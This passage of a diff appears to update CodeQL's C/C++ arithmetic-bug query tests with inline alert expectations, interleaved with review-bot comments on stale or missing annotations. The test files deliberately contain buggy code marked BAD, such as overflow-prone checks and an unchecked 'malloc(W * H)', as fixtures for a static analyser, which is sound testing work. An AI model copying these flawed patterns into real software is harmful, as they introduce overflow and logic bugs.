overflow // $ Alert[cpp/signed-overflow-check] } bool multipleCasts(char x) { 
@@ -110,7 +110,7 @@ bool multipleCasts2(char x) { // BAD [BadAdditionOverflowCheck.ql] // GOOD [SigneOverflowCheck.ql]: Test always fails, but will never overflow. - return (int)(unsigned short)(x + '1') < (int)(unsigned short)x; + return (int)(unsigned short)(x + '1') < (int)(unsigned short)x; // $ Alert[cpp/bad-addition-overflow-check] } int does_it_overflow(int n1, unsigned short delta) { @@ -119,7 +119,7 @@ int does_it_overflow(int n1, unsigned short delta) { int overflow12b(int n) { // not deleted by gcc or clang - return ((unsigned)(n + 32) <= (unsigned)n? -1: 1); // BAD: n + 32 may overflow + return ((unsigned)(n + 32) <= (unsigned)n? -1: 1); // BAD: n + 32 may overflow // $ Alert[cpp/signed-overflow-check] } #define MACRO(E1, E2) (E1) <= (E2)? -1: 1 diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.qlref index dde648402029..a8d760f993f8 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/SignedOverflowCheck.ql +query: Likely Bugs/Arithmetic/SignedOverflowCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/templates.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/templates.cpp index 7aa83440fd52..546ff7488fc5 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/templates.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/templates.cpp 
@@ -14,7 +14,7 @@ bool compareValues() { return T1::value < T2::value || // GOOD T1::value < T1::value || // BAD [NOT DETECTED] - C1::value < C1::value ; // BAD + C1::value < C1::value ; // BAD // $ Alert[cpp/comparison-of-identical-expressions] } bool callCompareValues() { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/test.cpp index e36956f9c690..af3462aaee8a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/test.cpp @@ -1,6 +1,6 @@ // Test for BadAdditionOverflowCheck. bool checkOverflow1(unsigned short a, unsigned short b) { - return (a + b < a); // BAD: comparison always false (due to promotion). + return (a + b < a); // BAD: comparison always false (due to promotion). // $ Alert[cpp/bad-addition-overflow-check] } // Test for BadAdditionOverflowCheck. @@ -10,7 +10,7 @@ bool checkOverflow2(unsigned short a, unsigned short b) { // Test for PointlessSelfComparison. bool selfCmp1(int x) { - return (x == (int)x); // BAD: always returns true. + return (x == (int)x); // BAD: always returns true. // $ Alert[cpp/comparison-of-identical-expressions] } // Test for PointlessSelfComparison. @@ -26,8 +26,8 @@ bool isnan(double x) { // Tests for ComparisonWithCancelingSubExpr. void cmpWithCancelingVar1(unsigned short x, unsigned short y, unsigned short z) { bool b; - b = x + y < x + z; // BAD: x can be canceled - b = x + y - x < z; // BAD: x can be canceled + b = x + y < x + z; // BAD: x can be canceled // $ Alert[cpp/comparison-canceling-subexpr] + b = x + y - x < z; // BAD: x can be canceled // $ Alert[cpp/comparison-canceling-subexpr] b = 2*x + y < 2*x + z; // BAD: x can be canceled b = 3*x + y - 2*x < z + x; // BAD: x can be canceled b = (-x) - (+x) < z - 2*x; // BAD: x can be canceled 
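Review bot: In the `cmpWithCancelingVar1` hunk of test.cpp only the first two `// BAD: x can be canceled` lines gain an expectation; the three that follow (`2*x + y < 2*x + z`, `3*x + y - 2*x < z + x`, `(-x) - (+x) < z - 2*x`) stay marked BAD with no annotation, so the known gap is recorded only in prose. If these are false negatives of the query, which is presumably what the old expected output encoded, state it in machine-readable form with `// $ MISSING: Alert[cpp/comparison-canceling-subexpr]`. The same applies to the `[NOT DETECTED]` lines left as plain comments in templates.cpp in the hunk above, in IntMultToLong.c and in PointlessComparison.c and PointlessComparison.cpp. The function body continues outside the hunk.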
@@ -76,18 +76,18 @@ bool cmpWithCancelingVar3(int x) { bool selfCmp3(unsigned short x) { x++; - return (x == (unsigned short)x); // BAD: always returns true. + return (x == (unsigned short)x); // BAD: always returns true. // $ Alert[cpp/comparison-of-identical-expressions] } bool selfCmp4(int x) { - while (x == x) // BAD: always returns true. + while (x == x) // BAD: always returns true. // $ Alert[cpp/comparison-of-identical-expressions] { x = x + 1; } } bool selfCmp5(int x) { - while (x == x) // BAD: always returns true. [NOT DETECTED] + while (x == x) // BAD: always returns true. [NOT DETECTED] // $ Alert[cpp/comparison-of-identical-expressions] { x++; } @@ -105,7 +105,7 @@ bool checkOverflow3(unsigned int a, unsigned short b) { return false; } - return (a + b < a); // GOOD: b is automatically promoted to unsigned int + return (a + b < a); // GOOD: b is automatically promoted to unsigned int // $ Alert[cpp/comparison-canceling-subexpr] } // We imagine that the next two lines come from a platform-specific header. @@ -115,7 +115,7 @@ typedef unsigned long long size_t; int isSmallEnough(unsigned long long x) { // The cast is to the same syntactic type, and there is no macro involved. // That makes the cast redundant, and therefore the comparison is redundant. - if ((unsigned long long)x != x) { // BAD + if ((unsigned long long)x != x) { // BAD // $ Alert[cpp/comparison-of-identical-expressions] return 0; } // These comparisons are pointless on the platform where this test runs, but @@ -148,5 +148,5 @@ void useMarkRange(int offs) { #define MY_MACRO(x) (x) void myMacroTest(int x) { - MY_MACRO(x == x); // BAD + MY_MACRO(x == x); // BAD // $ Alert[cpp/comparison-of-identical-expressions] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/BadCheckOdd.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/BadCheckOdd.qlref index 14c3e5c97e1d..544f107b3ff4 100644 
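Review bot: The `selfCmp5` line now reads `// BAD: always returns true. [NOT DETECTED] // $ Alert[cpp/comparison-of-identical-expressions]`, so the prose says the query misses this case while the expectation says it reports it. Assuming the annotation reflects the current query output, the `[NOT DETECTED]` marker is stale and should be dropped: `while (x == x) // BAD: always returns true. // $ Alert[cpp/comparison-of-identical-expressions]`. The same contradiction appears in RegressionTests.cpp, where `[NO LONGER REPORTED]` sits next to `// $ Alert[cpp/constant-comparison]`.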
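Review bot: In `checkOverflow3` a line documented as `// GOOD` now carries a plain `// $ Alert[cpp/comparison-canceling-subexpr]`, which pins a result on code the comment calls correct as if it were a wanted finding. If the alert is a false positive of that query, mark it as `// $ SPURIOUS: Alert[cpp/comparison-canceling-subexpr]`; if the GOOD verdict refers only to BadAdditionOverflowCheck, say so in the comment, as SignedOverflowCheck.cpp does with its per-query labels. `negative_zero` in PointlessComparison.c has the same shape (`// GOOD [FALSE POSITIVE] // $ Alert[cpp/constant-comparison]`). The function starts outside the hunk.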
--- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/BadCheckOdd.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/BadCheckOdd.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/BadCheckOdd.ql +query: Likely Bugs/Arithmetic/BadCheckOdd.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/test.cpp index 14d030f14ef7..2d5dbab0906c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/test.cpp @@ -1,5 +1,5 @@ int test1(int x) { - return x % 2 == 1; // BAD + return x % 2 == 1; // BAD // $ Alert } int test2(unsigned int x) { @@ -7,7 +7,7 @@ int test2(unsigned int x) { } int test3(short x) { - return x % 2 == 1; // BAD + return x % 2 == 1; // BAD // $ Alert } int test4(unsigned short x) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/BitwiseSignCheck.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/BitwiseSignCheck.qlref index 27d5a87962e4..0a74257ab6e0 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/BitwiseSignCheck.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/BitwiseSignCheck.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/BitwiseSignCheck.ql \ No newline at end of file +query: Likely Bugs/Arithmetic/BitwiseSignCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/bsc.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/bsc.cpp index 8aab27bcf4d2..a869af366120 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/bsc.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/bsc.cpp 
@@ -1,9 +1,9 @@ bool is_bit_set_v1(int x, int bitnum) { - return (x & (1 << bitnum)) > 0; // BAD + return (x & (1 << bitnum)) > 0; // BAD // $ Alert } bool is_bit_set_v2(int x, int bitnum) { - return ((1 << bitnum) & x) > 0; // BAD + return ((1 << bitnum) & x) > 0; // BAD // $ Alert } bool plain_wrong(int x, int bitnum) { @@ -15,11 +15,11 @@ bool is_bit24_set(int x) { } bool is_bit31_set_bad_v1(int x) { - return (x & (1 << 31)) > 0; // BAD + return (x & (1 << 31)) > 0; // BAD // $ Alert } bool is_bit31_set_bad_v2(int x) { - return 0 < (x & (1 << 31)); // BAD + return 0 < (x & (1 << 31)); // BAD // $ Alert } bool is_bit31_set_good(int x) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/ComparisonPrecedence.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/ComparisonPrecedence.qlref index 1fd4cfa3e183..1ffebc3c0cbd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/ComparisonPrecedence.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/ComparisonPrecedence.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/ComparisonPrecedence.ql +query: Likely Bugs/Arithmetic/ComparisonPrecedence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/template.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/template.cpp index 37280b8da751..8898124b5667 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/template.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/template.cpp @@ -1,7 +1,7 @@ template void templateFunc1(T x, T y, T z) { - if (x < y < z) {} // BAD (though dubious as we can imagine other instantiations using an overloaded `operator<`) + if (x < y < z) {} // BAD (though dubious as we can imagine other instantiations using an overloaded `operator<`) // $ Alert if (x < y && y < z) {} // GOOD }; 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/test.cpp index 3a82d5c37d59..73ff07e6bbc1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/test.cpp @@ -39,19 +39,19 @@ class MyClass2 { void test1(int x, int y, int z) { // built-in comparison - if (x < y < z) {} // BAD - if (x > y > z) {} // BAD - if (x <= y <= z) {} // BAD - if (x <= y <= z) {} // BAD - if (x < y > z) {} // BAD + if (x < y < z) {} // BAD // $ Alert + if (x > y > z) {} // BAD // $ Alert + if (x <= y <= z) {} // BAD // $ Alert + if (x <= y <= z) {} // BAD // $ Alert + if (x < y > z) {} // BAD // $ Alert if ((x < y) && (y < z)) {} // GOOD if (x < y && y < z) {} // GOOD - if ((x + 1) < (y + 1) < (z + 1)) {} // BAD - if (x < x + y < z) {} // BAD + if ((x + 1) < (y + 1) < (z + 1)) {} // BAD // $ Alert + if (x < x + y < z) {} // BAD // $ Alert if ((x < y) < z) {} // GOOD (this is deliberately allowed) - if (!(x < y < z)) {} // BAD + if (!(x < y < z)) {} // BAD // $ Alert // overloaded comparison { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/FloatComparison.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/FloatComparison.qlref index 7a65c3a0dee0..2984d2c1968a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/FloatComparison.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/FloatComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/FloatComparison.ql +query: Likely Bugs/Arithmetic/FloatComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/c.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/c.c index 9cf59f342c06..5b78d4d4aa70 100644 
--- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/c.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/c.c @@ -7,13 +7,13 @@ void c_f(void) { x == 3.0; 3.0 == x; x == x; - x == y; + x == y; // $ Alert g() == 3.0; 3.0 == g(); - g() == g(); + g() == g(); // $ Alert - x == g(); - g() == x; + x == g(); // $ Alert + g() == x; // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/Buildless.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/Buildless.c index 3d01a28fae0a..57b04c28b829 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/Buildless.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/Buildless.c @@ -3,7 +3,7 @@ void test_float_double1(float f, double d) { float r1 = f * f; // GOOD float r2 = f * d; // GOOD - double r3 = f * f; // BAD + double r3 = f * f; // BAD // $ Alert double r4 = f * d; // GOOD float f1 = fabsf(f * f); // GOOD @@ -18,7 +18,7 @@ float fabsf(float f); void test_float_double2(float f, double d) { float r1 = f * f; // GOOD float r2 = f * d; // GOOD - double r3 = f * f; // BAD + double r3 = f * f; // BAD // $ Alert double r4 = f * d; // GOOD float f1 = fabsf(f * f); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.c index 7639c76bd8fc..c8d396d1da50 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.c 
@@ -1,10 +1,10 @@ long long f(short x, int y, long long z) { y == x * x; // safe y == x * (int)x; // safe - z == y * x; // unsafe + z == y * x; // unsafe // $ Alert z == (long long)(y * x); // we assume the user knows what they are doing if(x == 56) - return y * y; // unsafe + return y * y; // unsafe // $ Alert if(x == 56) return (long long)(y * y); // we assume the user knows what they are doing return 42 * 23; // safe @@ -15,10 +15,10 @@ void int_float(int i, int j, long long ll, float f, float g, double h, char c) { // but the target type does not imply that the developer anticipates one as with // an int -> long long conversion. We should therefore not flag these cases. - double v1_1 = f * g; // unsafe (float -> double) + double v1_1 = f * g; // unsafe (float -> double) // $ Alert double v1_2 = f * (double)g; // safe - double v2_1 = (i + j) * f; // unsafe (float -> double) + double v2_1 = (i + j) * f; // unsafe (float -> double) // $ Alert double v2_2 = (i + j) * (double)f; // safe double v3_1 = i * j; // dubious (int -> double) @@ -35,7 +35,7 @@ void int_float(int i, int j, long long ll, float f, float g, double h, char c) { int v6_1 = f * g; // safe (float -> int) int v6_2 = (int)f * g; // safe - double v7_1 = f * f; // unsafe (float -> double) + double v7_1 = f * f; // unsafe (float -> double) // $ Alert double v7_2 = h * h; // safe double v7_3 = (f * f); // unsafe (float -> double) [NOT DETECTED] 
@@ -56,11 +56,11 @@ void int_float(int i, int j, long long ll, float f, float g, double h, char c) { float v12_2 = 1.0f + f * f + f * f; // safe double v13_1 = f * f * 2.0; // unsafe (float -> double) [NOT DETECTED] - double v13_2 = f * f * 2.0f; // unsafe (float -> double) + double v13_2 = f * f * 2.0f; // unsafe (float -> double) // $ Alert - long long v14_1 = i * (i + 2) + ll; // unsafe (int -> long long) + long long v14_1 = i * (i + 2) + ll; // unsafe (int -> long long) // $ Alert long long v14_2 = i * (i + 2ll) * ll; // safe - long long v14_3 = i * (i + (int)2ll) + ll; // unsafe (int -> long long) + long long v14_3 = i * (i + (int)2ll) + ll; // unsafe (int -> long long) // $ Alert } typedef unsigned long long size_t; @@ -72,7 +72,7 @@ void use_size_t(int W, int H) int y = 20; const int vs[] = {10, 20}; - malloc(W * H); // unsafe (int -> size_t) + malloc(W * H); // unsafe (int -> size_t) // $ Alert malloc((size_t)W * (size_t)H); // safe malloc(10 * 20); // safe (small values) 
@@ -96,16 +96,16 @@ size_t three_chars(unsigned char a, unsigned char b, unsigned char c) { void g(unsigned char uchar1, unsigned char uchar2, unsigned char uchar3, int i) { unsigned long ulong1, ulong2, ulong3, ulong4, ulong5; ulong1 = (uchar1 + 1) * (uchar2 + 1); // GOOD - ulong2 = (i + 1) * (uchar2 + 1); // BAD + ulong2 = (i + 1) * (uchar2 + 1); // BAD // $ Alert ulong3 = (uchar1 + 1) * (uchar2 + 1) * (uchar3 + 1); // GOOD ulong4 = (uchar1 + (uchar1 + 1)) * (uchar2 + 1); // GOOD - ulong5 = (i + (uchar1 + 1)) * (uchar2 + 1); // BAD + ulong5 = (i + (uchar1 + 1)) * (uchar2 + 1); // BAD // $ Alert ulong5 = (uchar1 + 1073741824) * uchar2; // BAD [NOT DETECTED] ulong5 = (uchar1 + (1 << 30)) * uchar2; // BAD [NOT DETECTED] ulong5 = uchar1 * uchar1 * uchar1 * uchar2 * uchar2 * uchar2; // BAD [NOT DETECTED] - ulong5 = (uchar1 + (unsigned short)(-1)) * (uchar2 + (unsigned short)(-1)); // BAD + ulong5 = (uchar1 + (unsigned short)(-1)) * (uchar2 + (unsigned short)(-1)); // BAD // $ Alert } struct A { @@ -116,13 +116,13 @@ struct A { void g2(struct A* a, short n) { unsigned long ulong1, ulong2; ulong1 = (a->s - 1) * ((*a).s + 1); // GOOD - ulong2 = a->i * (*a).i; // BAD + ulong2 = a->i * (*a).i; // BAD // $ Alert } int global_i; unsigned char global_uchar; void g3() { unsigned long ulong1, ulong2; - ulong1 = global_i * global_i; // BAD + ulong1 = global_i * global_i; // BAD // $ Alert ulong2 = (global_uchar + 1) * 2; // GOOD } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.cpp index 28f22194ff7a..4266c3c3af58 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.cpp 
@@ -1,5 +1,5 @@ int i = 2000000000; -long j = i * i; // BAD +long j = i * i; // BAD // $ Alert long k = (long) i * i; // GOOD long l = (long) (i * i); // permitted as the conversion is explicit long m = static_cast (i) * i; // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.qlref index d2ced0155755..4616a5ea9dc8 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/IntMultToLong.ql +query: Likely Bugs/Arithmetic/IntMultToLong.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/ConstVirtual.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/ConstVirtual.cpp index b04f344c26ab..c993f180005a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/ConstVirtual.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/ConstVirtual.cpp @@ -21,7 +21,7 @@ int g(C *c, int i) { return -1; } - if (i > 0) { // BAD + if (i > 0) { // BAD // $ Alert[cpp/constant-comparison] return 1; } else { return 0; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.c index fd1bc655051d..71447e6d88db 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.c 
@@ -4,19 +4,19 @@ void myFunction1() { for (i = 0;; i = i+1) { - if (i < 20) result++; - if (i <= 20) result++; - if (i > 20) result++; - if (i >= 20) result++; - if (i == 20) result++; - if (i != 20) result++; - - if (i < -1) result++; - if (i <= -1) result++; - if (i > -1) result++; - if (i >= -1) result++; - if (i == -1) result++; - if (i != -1) result++; + if (i < 20) result++; // $ Alert[cpp/constant-comparison] + if (i <= 20) result++; // $ Alert[cpp/constant-comparison] + if (i > 20) result++; // $ Alert[cpp/constant-comparison] + if (i >= 20) result++; // $ Alert[cpp/constant-comparison] + if (i == 20) result++; // $ Alert[cpp/constant-comparison] + if (i != 20) result++; // $ Alert[cpp/constant-comparison] + + if (i < -1) result++; // $ Alert[cpp/constant-comparison] + if (i <= -1) result++; // $ Alert[cpp/constant-comparison] + if (i > -1) result++; // $ Alert[cpp/constant-comparison] + if (i >= -1) result++; // $ Alert[cpp/constant-comparison] + if (i == -1) result++; // $ Alert[cpp/constant-comparison] + if (i != -1) result++; // $ Alert[cpp/constant-comparison] if (i < 5) result++; if (i <= 5) result++; 
@@ -35,19 +35,19 @@ void myFunction2() { for (i = 0;; i++) { - if (i < 20) result++; - if (i <= 20) result++; - if (i > 20) result++; - if (i >= 20) result++; - if (i == 20) result++; - if (i != 20) result++; + if (i < 20) result++; // $ Alert[cpp/constant-comparison] + if (i <= 20) result++; // $ Alert[cpp/constant-comparison] + if (i > 20) result++; // $ Alert[cpp/constant-comparison] + if (i >= 20) result++; // $ Alert[cpp/constant-comparison] + if (i == 20) result++; // $ Alert[cpp/constant-comparison] + if (i != 20) result++; // $ Alert[cpp/constant-comparison] - if (i < -1) result++; - if (i <= -1) result++; - if (i > -1) result++; - if (i >= -1) result++; - if (i == -1) result++; - if (i != -1) result++; + if (i < -1) result++; // $ Alert[cpp/constant-comparison] + if (i <= -1) result++; // $ Alert[cpp/constant-comparison] + if (i > -1) result++; // $ Alert[cpp/constant-comparison] + if (i >= -1) result++; // $ Alert[cpp/constant-comparison] + if (i == -1) result++; // $ Alert[cpp/constant-comparison] + if (i != -1) result++; // $ Alert[cpp/constant-comparison] if (i < 5) result++; if (i <= 5) result++; @@ -62,7 +62,7 @@ void myFunction2() { int myFunction3(int i) { if (i < 4) { - if (i < 5) { + if (i < 5) { // $ Alert[cpp/constant-comparison] return 1; } } @@ -100,11 +100,11 @@ int myFunction4() { // Pointless checks for unsigned values being negative int unsignedBounds(unsigned int a, unsigned long b, unsigned long long c) { - if (a < 0) { + if (a < 0) { // $ Alert[cpp/constant-comparison] return 1; } - if (b >= 0) { // UnsignedGEZero - if (b > 0 && c < 0) { // Only the test of c is bad here + if (b >= 0) { // UnsignedGEZero // $ Alert[cpp/unsigned-comparison-zero] + if (b > 0 && c < 0) { // Only the test of c is bad here // $ Alert[cpp/constant-comparison] return 1; } } 
@@ -113,20 +113,20 @@ int unsignedBounds(unsigned int a, unsigned long b, unsigned long long c) { int twoReasons(int a, int b) { if (a <= 0 && b > 5) { - return a < b; + return a < b; // $ Alert[cpp/constant-comparison] } if (a <= 100 && b > 105) { // BUG [Not detected - this clause is always false] - return a > b; + return a > b; // $ Alert[cpp/constant-comparison] } return 0; } int repeatedComparisons(int a) { if (a >= 20) { - return a >= 20; + return a >= 20; // $ Alert[cpp/constant-comparison] } if (a <= 3) { - return a > 3; + return a > 3; // $ Alert[cpp/constant-comparison] } return 0; } @@ -194,7 +194,7 @@ int myFunction5(int x) { i++; } d = i; - if (x < 0) { // Comparison is always false. + if (x < 0) { // Comparison is always false. // $ Alert[cpp/constant-comparison] if (d > -x) { // Unreachable code. return 1; } @@ -239,7 +239,7 @@ void macroExpansionTest() { int x; MAYBE_DO(x = 1); // GOOD (the problem is in the macro) - MAYBE_DO(if (global_setting >= 0) {x = 2;}); // BAD (the problem is in the invocation) + MAYBE_DO(if (global_setting >= 0) {x = 2;}); // BAD (the problem is in the invocation) // $ Alert[cpp/unsigned-comparison-zero] } int overeager_wraparound(unsigned int u32bound, unsigned long long u64bound) { @@ -261,7 +261,7 @@ int overeager_wraparound(unsigned int u32bound, unsigned long long u64bound) { int negative_zero(double dbl) { if (dbl >= 0) { - return dbl >= -dbl; // GOOD [FALSE POSITIVE] + return dbl >= -dbl; // GOOD [FALSE POSITIVE] // $ Alert[cpp/constant-comparison] } return 0; } @@ -270,7 +270,7 @@ typedef unsigned char u8; int widening_cast1(u8 c) { if (c == 0) { - if ((int)c > 0) { // BAD + if ((int)c > 0) { // BAD // $ Alert[cpp/constant-comparison] return 1; } } @@ -280,7 +280,7 @@ int widening_cast1(u8 c) { int widening_cast2(u8 c) { if (c <= 10) return -1; - else if ((c >= 11) /* BAD */ && (c <= 47)) + else if ((c >= 11) /* BAD */ && (c <= 47)) // $ Alert[cpp/constant-comparison] return 0; else return 1; 
@@ -291,7 +291,7 @@ int unsigned_implicit_conversion(unsigned int ui1) { // implicit signedness conversion is on the constants (0 and 5), not on the // variables (ui1). if (ui1 == 0) { - if (ui1 >= 5) { // BAD + if (ui1 >= 5) { // BAD // $ Alert[cpp/constant-comparison] return 1; } } @@ -300,7 +300,7 @@ int unsigned_implicit_conversion(unsigned int ui1) { int signedness_cast1(u8 c) { if ((signed char)c == 0) { - if (c >= 5) { // BAD + if (c >= 5) { // BAD // $ Alert[cpp/constant-comparison] return 1; } } @@ -309,7 +309,7 @@ int signedness_cast1(u8 c) { int signedness_cast2(signed char c) { if ((u8)c == 0) { - if (c >= 5) { // BAD + if (c >= 5) { // BAD // $ Alert[cpp/constant-comparison] return 1; } } @@ -334,7 +334,7 @@ int nan2(double x) { if (x < 0.0) { return 100; } - else if (x >= 0.0) { // BAD [Always true] + else if (x >= 0.0) { // BAD [Always true] // $ Alert[cpp/constant-comparison] return 200; } else { @@ -369,8 +369,8 @@ void shifts(void) { unsigned int x = 3; - if (x >> 1 >= 1) {} // always true - if (x >> 1 >= 2) {} // always false + if (x >> 1 >= 1) {} // always true // $ Alert[cpp/constant-comparison] + if (x >> 1 >= 2) {} // always false // $ Alert[cpp/constant-comparison] if (x >> 1 == 1) {} // always true [NOT DETECTED] } @@ -380,15 +380,15 @@ void bitwise_ands() if ((x & 2) >= 1) {} if ((x & 2) >= 2) {} - if ((x & 2) >= 3) {} // always false + if ((x & 2) >= 3) {} // always false // $ Alert[cpp/constant-comparison] } void unsigned_mult(unsigned int x, unsigned int y) { if(x < 13 && y < 35) { - if(x * y > 1024) {} // always false + if(x * y > 1024) {} // always false // $ Alert[cpp/constant-comparison] if(x * y < 204) {} if(x >= 3 && y >= 2) { - if(x * y < 5) {} // always false + if(x * y < 5) {} // always false // $ Alert[cpp/constant-comparison] } } } 
